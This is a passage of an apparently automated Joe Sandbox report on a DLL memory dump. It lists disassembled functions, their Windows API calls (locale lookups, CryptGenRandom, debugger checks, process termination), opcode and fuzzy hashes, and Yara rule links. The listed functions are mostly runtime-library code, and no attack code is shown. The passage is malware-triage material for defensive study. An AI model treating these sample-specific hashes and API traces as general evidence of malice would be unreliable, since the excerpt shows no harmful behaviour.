                                          Function 6D186F11 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,2000000B,6D18722F,00000002,00000000,?,?,?,6D18722F,?,00000000), ref: 6D186FAA
                                          • GetLocaleInfoW.KERNEL32(00000000,20001004,6D18722F,00000002,00000000,?,?,?,6D18722F,?,00000000), ref: 6D186FD3
                                          • GetACP.KERNEL32(?,?,6D18722F,?,00000000), ref: 6D186FE8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: ACP$OCP
                                          • API String ID: 2299586839-711371036
                                          • Opcode ID: 4147d8ab2af2e2c079a257ac181cc57f7c05e2ee01f6b637fcad8159fa62ba1b
                                          • Instruction ID: 991e828cb6b85282f59298921bfe469b3f46b34667733c88c8152bbefb440142
                                          • Opcode Fuzzy Hash: 4147d8ab2af2e2c079a257ac181cc57f7c05e2ee01f6b637fcad8159fa62ba1b
                                          • Instruction Fuzzy Hash: 4B21A13272410AAAD721CF24DA21B9776B7BB65B50B428424F919DB10EE7B2DD40CBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D1870E6 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6D17B05D: GetLastError.KERNEL32(?,?,?,6D17D632,?,00000001,6D173A72,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000), ref: 6D17B062
                                            • Part of subcall function 6D17B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000,00000000,6D1A6E90,0000002C,6D173A72), ref: 6D17B100
                                            • Part of subcall function 6D17B05D: _free.LIBCMT ref: 6D17B0BF
                                            • Part of subcall function 6D17B05D: _free.LIBCMT ref: 6D17B0F5
                                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6D1871F2
                                          • IsValidCodePage.KERNEL32(00000000), ref: 6D18723B
                                          • IsValidLocale.KERNEL32(?,00000001), ref: 6D18724A
                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6D187292
                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6D1872B1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                          • String ID:
                                          • API String ID: 949163717-0
                                          • Opcode ID: eaef3830105afd51af4c534cbfacc30705d0666d5fc6d2812e7370363ff2a9c2
                                          • Instruction ID: 2365f0498032d92d83d115148e071e248dab89c5a60e56bc7bca73f8f236a56a
                                          • Opcode Fuzzy Hash: eaef3830105afd51af4c534cbfacc30705d0666d5fc6d2812e7370363ff2a9c2
                                          • Instruction Fuzzy Hash: D1516F71E0420AABEB11DFA4CC80FBAB7B9AF55705F05446AE920D7159E7F09500CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D151A70 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260encryptionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(9726ABD3,75A8FC30,?), ref: 6D151AB8
                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6D151DF0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ContextCryptErrorLastRelease
                                          • String ID: operation failed with error $OS_Rng:
                                          • API String ID: 3299239745-700108173
                                          • Opcode ID: 284a89bf4e00364e38218f0aa863857c205653244ebf29837bdd342d677da4dc
                                          • Instruction ID: 2a1c9f5c3ee63809f89b6a2def9a5ccbc36869bb1a0c055ee4777f25a9b06844
                                          • Opcode Fuzzy Hash: 284a89bf4e00364e38218f0aa863857c205653244ebf29837bdd342d677da4dc
                                          • Instruction Fuzzy Hash: 29A1F1B1D002488FEB15CF68CC94BEDBB75FF46304F208299E125AB685DBB49AC5CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D186785 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6D17B05D: GetLastError.KERNEL32(?,?,?,6D17D632,?,00000001,6D173A72,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000), ref: 6D17B062
                                            • Part of subcall function 6D17B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000,00000000,6D1A6E90,0000002C,6D173A72), ref: 6D17B100
                                          • GetACP.KERNEL32(?,?,?,?,?,?,6D17C15D,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 6D186846
                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6D17C15D,?,?,?,00000055,?,-00000050,?,?), ref: 6D186871
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6D1869D4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorLast$CodeInfoLocalePageValid
                                          • String ID: utf8
                                          • API String ID: 607553120-905460609
                                          • Opcode ID: f090d4b0e2ad2a16e5e0957dbb022e8b3a57b130295a01f5f739e0612ca48a94
                                          • Instruction ID: 89bd73fe221aca5c898d2c21e6697b7460bb8a3c89508ca830e442f9ebbf3640
                                          • Opcode Fuzzy Hash: f090d4b0e2ad2a16e5e0957dbb022e8b3a57b130295a01f5f739e0612ca48a94
                                          • Instruction Fuzzy Hash: DE711671A2470AAAE715DB34DC45FBB33A8EF55704F11442AE619DB18AEBF0D940CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D16855E Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6D16856A
                                          • IsDebuggerPresent.KERNEL32 ref: 6D168636
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6D168656
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 6D168660
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                          • String ID:
                                          • API String ID: 254469556-0
                                          • Opcode ID: 73b3d0d70d979450debbb90a6e5cd7aea163a7d112676a8bd08915a2f6e0917e
                                          • Instruction ID: b16580ae8e7e264a822870e93bc9981662eaeaadfa08eb519b91c31fe129e512
                                          • Opcode Fuzzy Hash: 73b3d0d70d979450debbb90a6e5cd7aea163a7d112676a8bd08915a2f6e0917e
                                          • Instruction Fuzzy Hash: 3D313675D05258DBDB10EFA0D9897CCBBB8AF09304F1041AAE50CAB290EBB49A848F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D151F30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152encryptionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CryptGenRandom.ADVAPI32(6D144435,00000000,00000001), ref: 6D151FC8
                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6D151FEB
                                            • Part of subcall function 6D167E22: EnterCriticalSection.KERNEL32(6D1CB368,?,00000000,?,6D15203E,6D1C9F48,00000001), ref: 6D167E2D
                                            • Part of subcall function 6D167E22: LeaveCriticalSection.KERNEL32(6D1CB368,?,6D15203E,6D1C9F48,00000001), ref: 6D167E6A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: CriticalCryptSection$ContextEnterLeaveRandomRelease
                                          • String ID: CryptGenRandom
                                          • API String ID: 1877079010-3616286655
                                          • Opcode ID: a81d802db16d94a19a8d56ee9132b4f1531f61f48e56c2a2433915615e0fb8ab
                                          • Instruction ID: a5e5fa7b265e297cf8206b40e3e9de0a779a35e3c4f8d5c6e6a7069262a037b7
                                          • Opcode Fuzzy Hash: a81d802db16d94a19a8d56ee9132b4f1531f61f48e56c2a2433915615e0fb8ab
                                          • Instruction Fuzzy Hash: E15118B1804245DFCB11DF98C844FADBBB4FF15358F02419EE9216B389CBB8A964CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D186B98 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6D17B05D: GetLastError.KERNEL32(?,?,?,6D17D632,?,00000001,6D173A72,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000), ref: 6D17B062
                                            • Part of subcall function 6D17B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000,00000000,6D1A6E90,0000002C,6D173A72), ref: 6D17B100
                                            • Part of subcall function 6D17B05D: _free.LIBCMT ref: 6D17B0BF
                                            • Part of subcall function 6D17B05D: _free.LIBCMT ref: 6D17B0F5
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D186BEC
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D186C36
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D186CFC
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: InfoLocale$ErrorLast_free
                                          • String ID:
                                          • API String ID: 3140898709-0
                                          • Opcode ID: c2fd4672c386a6ef2d426ec6801ba2e79e61f7237d44b7a7c04622f0d936a194
                                          • Instruction ID: b4fbcb656630b0cf970a6a14008a30d7d312e127787495d152f6297776ec7e7f
                                          • Opcode Fuzzy Hash: c2fd4672c386a6ef2d426ec6801ba2e79e61f7237d44b7a7c04622f0d936a194
                                          • Instruction Fuzzy Hash: DF61B17196420B9FEB19DF28DD81BBA77B8EF14300F10426AE915C628EE7B4D944CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D17300E Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6D173106
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6D173110
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6D17311D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 23328ae864bb3bfc3d794d276ead9774f5b48b799307a9990ec85ee2f7d47b6b
                                          • Instruction ID: 2534a369cc84a20ad55fae827e242cfc4156d237ca1fd6d2466d962d2bd8cc97
                                          • Opcode Fuzzy Hash: 23328ae864bb3bfc3d794d276ead9774f5b48b799307a9990ec85ee2f7d47b6b
                                          • Instruction Fuzzy Hash: 2C31E4749012699BCB21DF64D8887DCBBB8BF19314F5042EAE51CA7290E7B09B818F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D179141 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,6D179140,?,00000001,?,?), ref: 6D179163
                                          • TerminateProcess.KERNEL32(00000000,?,6D179140,?,00000001,?,?), ref: 6D17916A
                                          • ExitProcess.KERNEL32 ref: 6D17917C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: eece246680fc6cc76aee4cf5c16baee870af7df2dd91eb4afbbac2ae714aa927
                                          • Instruction ID: b5ab9ffc5de450f0ab651ec34a763dfadc081364a37bb8538832e9315bdc236b
                                          • Opcode Fuzzy Hash: eece246680fc6cc76aee4cf5c16baee870af7df2dd91eb4afbbac2ae714aa927
                                          • Instruction Fuzzy Hash: 6CE08C71000649AFCF22AF60DC1CB5C3B79FB4A292B100014F916C6131CBB5ED92DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D151E40 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67encryptionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CryptGenRandom.ADVAPI32(?,?), ref: 6D151E92
                                            • Part of subcall function 6D151A70: GetLastError.KERNEL32(9726ABD3,75A8FC30,?), ref: 6D151AB8
                                            • Part of subcall function 6D168F50: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00000000,?,?,6D1666CB,?,6D1A6AC8,00000000,?,00000000,?,?,?), ref: 6D168FB0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: CryptErrorExceptionLastRaiseRandom
                                          • String ID: CryptGenRandom
                                          • API String ID: 1262793447-3616286655
                                          • Opcode ID: 3c6b776b6114f82fb1a139d7bb9bb3cf6914a1e091dbe3835d4875c155244cb1
                                          • Instruction ID: a45980585ff0cf52f1e60471384005cbad16c16071bb666ba9047b7b4c01f28b
                                          • Opcode Fuzzy Hash: 3c6b776b6114f82fb1a139d7bb9bb3cf6914a1e091dbe3835d4875c155244cb1
                                          • Instruction Fuzzy Hash: 6F210BB1844248EFCB11DFA4CC04FED7BB4FB15324F01466AE92167688DBF86950CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D186DEB Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6D17B05D: GetLastError.KERNEL32(?,?,?,6D17D632,?,00000001,6D173A72,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000), ref: 6D17B062
                                            • Part of subcall function 6D17B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000,00000000,6D1A6E90,0000002C,6D173A72), ref: 6D17B100
                                            • Part of subcall function 6D17B05D: _free.LIBCMT ref: 6D17B0BF
                                            • Part of subcall function 6D17B05D: _free.LIBCMT ref: 6D17B0F5
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D186E3F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorLast_free$InfoLocale
                                          • String ID:
                                          • API String ID: 2003897158-0
                                          • Opcode ID: a7aeeea20bf51867820791ee9afa6ee12d2b4f0dfdaefb9d63bb633076fc53f0
                                          • Instruction ID: 2f2b4b25bdbddb9f414096a53dd899eb90a89a8d3eedcecd6f0d2914e4ae1283
                                          • Opcode Fuzzy Hash: a7aeeea20bf51867820791ee9afa6ee12d2b4f0dfdaefb9d63bb633076fc53f0
                                          • Instruction Fuzzy Hash: 0021C571A6930AABEB18DA24DC41E7A33B8EF15315F10407AEE15C6149EBB5E940CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D186A72 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6D17B05D: GetLastError.KERNEL32(?,?,?,6D17D632,?,00000001,6D173A72,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000), ref: 6D17B062
                                            • Part of subcall function 6D17B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000,00000000,6D1A6E90,0000002C,6D173A72), ref: 6D17B100
                                          • EnumSystemLocalesW.KERNEL32(6D186B98,00000001,00000000,?,-00000050,?,6D1871C6,00000000,?,?,?,00000055,?), ref: 6D186AE4
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2417226690-0
                                          • Opcode ID: 55559a53a83d0be9146ab6a7c3d69f05cfdae9957235fefb0b7533e571c2da00
                                          • Instruction ID: 034441792d70077e08af69d44d27fc35412d93dfdd2327e6e220289c4db6049b
                                          • Opcode Fuzzy Hash: 55559a53a83d0be9146ab6a7c3d69f05cfdae9957235fefb0b7533e571c2da00
